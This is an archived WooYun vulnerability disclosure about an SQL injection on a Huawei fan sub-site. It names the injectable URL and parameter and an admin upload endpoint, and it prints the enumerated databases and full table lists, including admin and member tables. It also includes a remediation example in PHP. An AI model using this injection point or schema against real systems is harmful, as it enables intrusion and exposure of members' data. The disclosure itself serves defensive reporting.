Vulnerability summary

Defect ID: wooyun-2014-056802

Title: SQL injection vulnerability on a Huawei sub-site

Vendor: Huawei Technologies Co., Ltd. (华为技术有限公司)

Author: Jacob

Submitted: 2014-04-15 10:48

Fix time: 2014-05-30 10:48

Disclosed: 2014-05-30 10:48

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure timeline:

2014-04-15: Details sent to the vendor, awaiting vendor action
2014-04-16: Vendor confirmed; details visible to the vendor only
2014-04-26: Details disclosed to core white hats and domain experts
2014-05-06: Details disclosed to regular white hats
2014-05-16: Details disclosed to intern white hats
2014-05-30: Details disclosed to the public

Brief description:

Everyone has been scrambling for Huawei phones lately, so I'm joining in the fun~

Detailed description:

Injection point:
http://fp.huafans.cn/?f=events&on=show&id=7090

available databases [4]:
[*] duihao_hw
[*] emotionui
[*] information_schema
[*] test


There is also an upload point:
http://fp.huafans.cn/admin/upload.php
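The injection point above is the `id` parameter of the events "show" route. The following is an added remediation example written for this write-up; it is not the site's code and is not taken from the report. It assumes the site is PHP (the `admin/upload.php` path suggests so), that the route is served from the `duihao_hw` database, and that event rows live in a table named `jo2_content` with `id`, `title` and `body` columns; the table role, column names and the `DB_DSN`/`DB_USER`/`DB_PASS` environment variables are assumptions, not facts from the page.

```php
<?php
// Added example, not the site's own code: a hardened handler for
// ?f=events&on=show&id=<n>, the route where the id parameter reached
// the database unsafely. Assumed (hypothetical): table jo2_content holds
// event rows with id/title/body columns; credentials come from env vars.

declare(strict_types=1);

function showEvent(PDO $db, array $query): ?array
{
    // Validate first: id must be a positive integer. Anything else
    // (quotes, UNION payloads, whitespace tricks) is rejected before it
    // can reach the database layer at all.
    $id = filter_var($query['id'] ?? null, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1],
    ]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }

    // Parameterised query: the value is bound, never string-concatenated,
    // so the request cannot change the statement's structure.
    $stmt = $db->prepare(
        'SELECT id, title, body FROM jo2_content WHERE id = :id LIMIT 1'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Assumed connection settings; the DSN and credentials are placeholders.
$db = new PDO(
    getenv('DB_DSN') ?: 'mysql:host=127.0.0.1;dbname=duihao_hw;charset=utf8mb4',
    getenv('DB_USER') ?: 'app',
    getenv('DB_PASS') ?: '',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        // Real server-side prepared statements, not client-side emulation.
        PDO::ATTR_EMULATE_PREPARES => false,
    ]
);

if (($_GET['f'] ?? '') === 'events' && ($_GET['on'] ?? '') === 'show') {
    $event = showEvent($db, $_GET);
    echo $event === null
        ? 'Not found'
        : htmlspecialchars($event['title'], ENT_QUOTES, 'UTF-8');
}
```

Two layers matter here: the integer validation turns a malformed `id` into a 400 before any query runs, and the bound parameter guarantees that even a value which passes validation elsewhere in the application cannot alter the SQL. Disabling emulated prepares makes MySQL itself enforce that separation. The `admin/upload.php` endpoint mentioned above is a separate issue that the report gives no detail on, so it is not covered by this example.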

Proof of vulnerability:

Database: duihao_hw
[32 tables]
+---------------------+
| jo2_admin |
| jo2_admin_role |
| jo2_admin_role_priv |
| jo2_adminrole |
| jo2_app |
| jo2_area |
| jo2_cate |
| jo2_choujiang |
| jo2_comment |
| jo2_config |
| jo2_content |
| jo2_content_text |
| jo2_dictionary |
| jo2_favorite |
| jo2_file |
| jo2_im |
| jo2_integral |
| jo2_keywords |
| jo2_link |
| jo2_lipin |
| jo2_menu |
| jo2_message |
| jo2_model |
| jo2_model_field |
| jo2_model_fields |
| jo2_sendmail |
| jo2_session |
| jo2_task |
| jo2_type |
| jo2_user |
| jo2_vote |
| jo2_zuopin |
+---------------------+


Could not crack a single one of the admin MD5 hashes...
The emotionui database seems to hold data for over 7 million members of the "花粉俱乐部" (Huafans Club):
http://cn.club.vmall.com/

Database: emotionui
[355 tables]
+------------------------------------+
| accounts_topic |
| emui_version_record |
| pre_common_addon |
| pre_common_admincp_cmenu |
| pre_common_admincp_group |
| pre_common_admincp_member |
| pre_common_admincp_perm |
| pre_common_admincp_session |
| pre_common_admingroup |
| pre_common_adminnote |
| pre_common_advertisement |
| pre_common_advertisement_custom |
| pre_common_banned |
| pre_common_block |
| pre_common_block_favorite |
| pre_common_block_item |
| pre_common_block_item_data |
| pre_common_block_permission |
| pre_common_block_pic |
| pre_common_block_style |
| pre_common_block_xml |
| pre_common_cache |
| pre_common_card |
| pre_common_card_log |
| pre_common_card_type |
| pre_common_credit_log |
| pre_common_credit_rule |
| pre_common_credit_rule_log |
| pre_common_credit_rule_log_field |
| pre_common_cron |
| pre_common_district |
| pre_common_diy_data |
| pre_common_domain |
| pre_common_failedlogin |
| pre_common_friendlink |
| pre_common_grouppm |
| pre_common_invite |
| pre_common_magic |
| pre_common_magiclog |
| pre_common_mailcron |
| pre_common_mailqueue |
| pre_common_member |
| pre_common_member_action_log |
| pre_common_member_connect |
| pre_common_member_count |
| pre_common_member_field_forum |
| pre_common_member_field_home |
| pre_common_member_grouppm |
| pre_common_member_log |
| pre_common_member_magic |
| pre_common_member_profile |
| pre_common_member_profile_setting |
| pre_common_member_security |
| pre_common_member_stat_field |
| pre_common_member_stat_fieldcache |
| pre_common_member_stat_search |
| pre_common_member_stat_searchcache |
| pre_common_member_status |
| pre_common_member_validate |
| pre_common_member_verify |
| pre_common_member_verify_info |
| pre_common_moderate |
| pre_common_myapp |
| pre_common_myinvite |
| pre_common_mytask |
| pre_common_nav |
| pre_common_onlinetime |
| pre_common_plugin |
| pre_common_pluginvar |
| pre_common_process |
| pre_common_regip |
| pre_common_relatedlink |
| pre_common_report |
| pre_common_searchindex |
| pre_common_secquestion |
| pre_common_session |
| pre_common_setting |
| pre_common_smiley |
| pre_common_sphinxcounter |
| pre_common_stat |
| pre_common_statuser |
| pre_common_style |
| pre_common_stylevar |
| pre_common_syscache |
| pre_common_tag |
| pre_common_tagitem |
| pre_common_task |
| pre_common_taskvar |
| pre_common_template |
| pre_common_template_block |
| pre_common_template_permission |
| pre_common_uin_black |
| pre_common_usergroup |
| pre_common_usergroup_field |
| pre_common_word |
| pre_common_word_type |
| pre_connect_feedlog |
| pre_connect_memberbindlog |
| pre_connect_tlog |
| pre_down_rom_log |
| pre_down_rom_newlog |
| pre_dsu_paulsign |
| pre_dsu_paulsignset |
| pre_emotion_activity |
| pre_emotion_addflower |
| pre_emotion_adimage_config |
| pre_emotion_apply |
| pre_emotion_bug |
| pre_emotion_bug_module |
| pre_emotion_bug_user |
| pre_emotion_clubinfo |
| pre_emotion_config |
| pre_emotion_download_restore_file |
| pre_emotion_forumthread |
| pre_emotion_gongge_emotion |
| pre_emotion_gongge_expectation |
| pre_emotion_gongge_feedback |
| pre_emotion_gongge_model |
| pre_emotion_gongge_relation |
| pre_emotion_gongge_satisfaction |
| pre_emotion_gongge_statistics |
| pre_emotion_gongge_topic |
| pre_emotion_gongge_unsatisfactory |
| pre_emotion_gongge_version |
| pre_emotion_group_class |
| pre_emotion_homeindex |
| pre_emotion_interface_devices |
| pre_emotion_lastmodel |
| pre_emotion_lasttr |
| pre_emotion_login |
| pre_emotion_logregister |
| pre_emotion_model |
| pre_emotion_model_version |
| pre_emotion_mysetting |
| pre_emotion_olympic |
| pre_emotion_otherweibo |
| pre_emotion_petal |
| pre_emotion_prov_post |
| pre_emotion_province |
| pre_emotion_registerlogin |
| pre_emotion_reinfo |
| pre_emotion_shorturl |
| pre_emotion_slider |
| pre_emotion_sohu_attach |
| pre_emotion_sohu_photo |
| pre_emotion_sohu_photo_pollvoter |
| pre_emotion_sohu_photo_recommend |
| pre_emotion_theme |
| pre_emotion_theme_comment |
| pre_emotion_tidbanlist |
| pre_emotion_transactionfailure |
| pre_emotion_uidbanlist |
| pre_emotion_univ |
| pre_emotion_univ_hot |
| pre_emotion_univ_member |
| pre_emotion_unlock_count |
| pre_emotion_unlock_log |
| pre_emotion_user_count |
| pre_emotion_version |
| pre_emotion_wallpaper |
| pre_emotion_wallpaper_comment |
| pre_emotion_weibo |
| pre_fansapk_count |
| pre_forum_access |
| pre_forum_activity |
| pre_forum_activityapply |
| pre_forum_announcement |
| pre_forum_attachment |
| pre_forum_attachment_0 |
| pre_forum_attachment_1 |
| pre_forum_attachment_2 |
| pre_forum_attachment_3 |
| pre_forum_attachment_4 |
| pre_forum_attachment_5 |
| pre_forum_attachment_6 |
| pre_forum_attachment_7 |
| pre_forum_attachment_8 |
| pre_forum_attachment_9 |
| pre_forum_attachment_unused |
| pre_forum_attachtype |
| pre_forum_bbcode |
| pre_forum_creditslog |
| pre_forum_debate |
| pre_forum_debatepost |
| pre_forum_faq |
| pre_forum_forum |
| pre_forum_forum_threadtable |
| pre_forum_forumfield |
| pre_forum_forumrecommend |
| pre_forum_groupcreditslog |
| pre_forum_groupfield |
| pre_forum_groupinvite |
| pre_forum_grouplevel |
| pre_forum_groupranking |
| pre_forum_groupuser |
| pre_forum_imagetype |
| pre_forum_medal |
| pre_forum_medallog |
| pre_forum_memberrecommend |
| pre_forum_moderator |
| pre_forum_modwork |
| pre_forum_onlinelist |
| pre_forum_order |
| pre_forum_poll |
| pre_forum_polloption |
| pre_forum_pollvoter |
| pre_forum_post |
| pre_forum_post_tableid |
| pre_forum_postcomment |
| pre_forum_postlog |
| pre_forum_postposition |
| pre_forum_poststick |
| pre_forum_promotion |
| pre_forum_ratelog |
| pre_forum_relatedthread |
| pre_forum_replycredit |
| pre_forum_rsscache |
| pre_forum_spacecache |
| pre_forum_statlog |
| pre_forum_thread |
| pre_forum_thread_copy |
| pre_forum_threadclass |
| pre_forum_threadimage |
| pre_forum_threadlog |
| pre_forum_threadmod |
| pre_forum_threadpartake |
| pre_forum_threadrush |
| pre_forum_threadtype |
| pre_forum_trade |
| pre_forum_tradecomment |
| pre_forum_tradelog |
| pre_forum_typeoption |
| pre_forum_typeoptionvar |
| pre_forum_typevar |
| pre_forum_uid_temp |
| pre_forum_warning |
| pre_home_album |
| pre_home_album_category |
| pre_home_appcreditlog |
| pre_home_blacklist |
| pre_home_blog |
| pre_home_blog_category |
| pre_home_blogfield |
| pre_home_class |
| pre_home_click |
| pre_home_clickuser |
| pre_home_comment |
| pre_home_docomment |
| pre_home_doing |
| pre_home_favorite |
| pre_home_feed |
| pre_home_feed_app |
| pre_home_friend |
| pre_home_friend_request |
| pre_home_friendlog |
| pre_home_notification |
| pre_home_pic |
| pre_home_picfield |
| pre_home_poke |
| pre_home_pokearchive |
| pre_home_share |
| pre_home_show |
| pre_home_specialuser |
| pre_home_userapp |
| pre_home_userappfield |
| pre_home_visitor |
| pre_league_table |
| pre_modpay_checklog |
| pre_modpay_join |
| pre_modpay_joinlog |
| pre_modpay_moneylog |
| pre_modpay_operatelog |
| pre_modpay_paylog |
| pre_modpay_policies |
| pre_modpay_prtable |
| pre_modpay_ratelog |
| pre_myrepeats |
| pre_mysetting_unlock |
| pre_phone_list |
| pre_phone_rom_department |
| pre_phone_rom_list |
| pre_phone_rom_model |
| pre_phone_rom_newrom |
| pre_phone_rom_type |
| pre_phone_tutorial_step |
| pre_phone_tutorial_step_link |
| pre_plugin_auction |
| pre_plugin_auction_message |
| pre_plugin_auction_xml |
| pre_plugin_auctionapply |
| pre_plugin_wheel_share |
| pre_portal_article_content |
| pre_portal_article_count |
| pre_portal_article_related |
| pre_portal_article_title |
| pre_portal_article_trash |
| pre_portal_attachment |
| pre_portal_category |
| pre_portal_category_permission |
| pre_portal_comment |
| pre_portal_rsscache |
| pre_portal_topic |
| pre_portal_topic_pic |
| pre_private_beta |
| pre_private_beta_pad |
| pre_security_evilpost |
| pre_security_eviluser |
| pre_security_failedlog |
| pre_temp_medal |
| pre_ucenter_admins |
| pre_ucenter_applications |
| pre_ucenter_badwords |
| pre_ucenter_domains |
| pre_ucenter_failedlogins |
| pre_ucenter_feeds |
| pre_ucenter_friends |
| pre_ucenter_mailqueue |
| pre_ucenter_memberfields |
| pre_ucenter_members |
| pre_ucenter_mergemembers |
| pre_ucenter_newpm |
| pre_ucenter_notelist |
| pre_ucenter_pm_indexes |
| pre_ucenter_pm_lists |
| pre_ucenter_pm_members |
| pre_ucenter_pm_messages_0 |
| pre_ucenter_pm_messages_1 |
| pre_ucenter_pm_messages_2 |
| pre_ucenter_pm_messages_3 |
| pre_ucenter_pm_messages_4 |
| pre_ucenter_pm_messages_5 |
| pre_ucenter_pm_messages_6 |
| pre_ucenter_pm_messages_7 |
| pre_ucenter_pm_messages_8 |
| pre_ucenter_pm_messages_9 |
| pre_ucenter_protectedmembers |
| pre_ucenter_settings |
| pre_ucenter_sqlcache |
| pre_ucenter_tags |
| pre_ucenter_vars |
| pre_want_record |
| t_test_1 |
| tb_app |
| tb_apply |
| tb_city |
| tb_config |
| tb_lottery |
| tb_lottery2 |
| tb_prize |
| tb_prize2 |
| tb_share |
| tb_user |
| tb_vote |
| tb_wallpaper |
| ts_x_attach |
+------------------------------------+

Fix recommendation:

Copyright notice: please credit the source when reposting: Jacob@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed: 2014-04-16 10:01

Vendor reply:

Important user data is protected by encryption, but injection vulnerabilities are high-impact; thanks to the white hat for the attention.

Latest status:

None yet